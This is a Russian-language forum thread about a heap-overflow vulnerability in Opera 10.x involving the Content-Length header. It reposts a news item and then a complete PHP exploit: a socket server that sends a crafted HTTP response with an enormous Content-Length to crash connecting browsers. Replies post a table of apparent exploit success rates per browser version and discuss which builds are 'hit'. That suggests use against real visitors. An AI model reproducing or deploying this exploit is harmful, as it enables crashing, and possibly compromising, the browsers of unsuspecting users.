В браузере Opera версий 10.x обнаружена высокоопасная уязвимость, позволяющая удаленному пользователю скомпрометировать целевую систему, а именно аварийно завершить работу браузера или выполнить произвольный код на системе с привилегиями пользователя, запустившего браузер Opera.

Уязвимость вызвана ошибкой переполнения буфера в результате ошибки при обработке HTTP ответов, содержащих специально сформированный HTTP заголовок Content-Length. Злоумышленник может, послав слишком длинное значение Content-Length, вызвать переполнение динамической памяти и, как следствие, выполнить произвольный код на удаленной системе с привилегиями пользователя или же аварийно завершить работу браузера.

В настоящее время способов устранения ошибки не существует. Рекомендуется или вовсе не посещать незнакомые сайты через Opera 10.x, или же посещать, но с пониженными привилегиями.

© (http://habrahabr.ru/blogs/infosecurity/86624/)

Любопытная тема.

сплоит:

<?php
if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win');
else define('OS','nix');
if(!extension_loaded('php_sockets'))
{
if((OS == 'win') && (!@dl('php_sockets.dll')) ||
((OS == 'nix') && (!@dl('php_sockets.so'))))
die('fatal php_sockets.[dll/so] '.
'not loaded '."\r\n"); //.__line__.' '.__file__."\r\n");
}
/*Generated by my own fuzzer*/
$EVIL = 'HTTP/1.1 200 ok'."\r\n".
'Transfer-Encoding: identity'."\r\n".
'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
'Server: moj zuy server'."\r\n".
'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
'Content-Location: file://C:/boot.ini'."\r\n".
'Vary:negotiate,accept-language,accept-charset'."\r\n".
'Tcn: choice'."\r\n".
'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
'Accept-Ranges: bytes'."\r\n".
'Cache-Control: max-age=0'."\r\n".
'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
'Content-Encoding: identity'."\r\n".
'Content-Length:9999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999666 '."\r\n".
'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
'Keep-Alive: timeout=15, max=300'."\r\n".
'Connection: keep-alive'."\r\n".
'Content-Type: text/html; charset=iso-8859-2'."\r\n".
'Age: 1'."\r\n".
'Allow: GET,HEAD'."\r\n".
'Content-Disposition: inline'."\r\n".
'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
'Warning: 199 Miscellaneous warning'."\r\n".
'Trailer: Max-Forwards'."\r\n".
'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
'Content-Range: bytes 21010-47021/47022'."\r\n".
'Content-Language: pl'."\r\n\r\n".
'<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
$buster = $argc - 1;
//use -port 666 if you need
for($i = 0; $i<=$buster; $i+=2)
{
if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1];
else $PORT = 81;
}
if(!($SOCKET = socket_create_listen($PORT)))
die('fatal socket init failed'."\r\n");
socket_set_option($SOCKET,SOL_SOCKET,
SO_RCVTIMEO,array("sec"=>3,"usec"=>0));
echo('SOCKET READY AT PORT '.$PORT."\r\n".
'Now connect here via opera'."\r\n");
if($CONNECT = socket_accept($SOCKET))
{
$recv_buffer = null;
echo('Connection ok '."\r\n");
if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))
{
if(!@socket_write($CONNECT,$EVIL))
{
socket_close($CONNECT);
socket_close($SOCKET);
die('I cant send payload !'."\r\n");
}
}
else echo('Something wrong with client side'."\r\n");
usleep(120000);
socket_close($CONNECT);
socket_close($SOCKET);
}
echo('OK ya browser must be death now'."\r\n".
'Have a nice day lol'."\r\n");
?>

автор: Marcin Ressel aka ~echo.
источник: securitylab.ru

Chrome 3.0 5 2 40
Chrome 4.0 72 14 19.44
Chrome 4.1 1 0 0
Chrome 5.0 4 1 25
FireFox 3.0.18 50 0 0
FireFox 3.0.3 4 0 0
FireFox 3.0.4 2 0 0
FireFox 3.0.5 4 0 0
FireFox 3.0.6 10 0 0
FireFox 3.5.5 17 1 5.88
FireFox 3.5.6 6 0 0
FireFox 3.5.7 18 2 11.11
FireFox 3.5.8 250 7 2.8
FireFox 3.6 150 8 5.33
MSIE 6.0 242 92 38.02
MSIE 7.0 371 66 17.79
MSIE 8.0 362 64 17.68
Opera 10.00 4 0 0
Opera 10.10 1 0 0
Opera 8.52 1 0 0
Opera 9.10 1 0 0
Opera 9.20 5 0 0
Opera 9.21 8 1 12.5
Opera 9.22 7 2 28.57
Opera 9.23 11 5 45.45
Opera 9.24 4 3 75
Opera 9.25 7 2 28.57
Opera 9.26 8 0 0
Opera 9.27 26 1 3.85
Opera 9.5 1 0 0
Opera 9.50 13 1 7.69
Opera 9.51 21 2 9.52
Opera 9.52 24 4 16.67
Opera 9.60 16 2 12.5
Opera 9.61 1 0 0
Opera 9.62 18 1 5.56
Opera 9.63 40 5 12.5
Opera 9.64 82 4 4.88
Opera 9.80 569 55 9.67


нет неуязвимых браузеров, но осел как всегда на высоте

Что-то у Opera 9.80 сильный пробив. Не ожидал.

и всётаки опера по статистике самая безопасная (не считая более старые версии)

Официальные источники уверяют, что 10.50 уже не exploitable. Надо будет проверить, а пока — Safari.

Chrome 4.0 72 14 19.44
А что за сплойт под хром?

удаленный код через эту уязвимость выполнить невозможно

А

Версия:
10.00

Сборка:
1750

пробивает?

PS новости уже неделя где-то, они что до сих пор не залатали дырку?

плоент не актуален - only dos + мою последнюю 10.5 build 3296 не пробило

10.50 не пробивается, .10 пробив на ура.

10.50 не пробивается, .10 пробив на ура.

так напугали, что снес 10.10 и установил 10.50 :mad: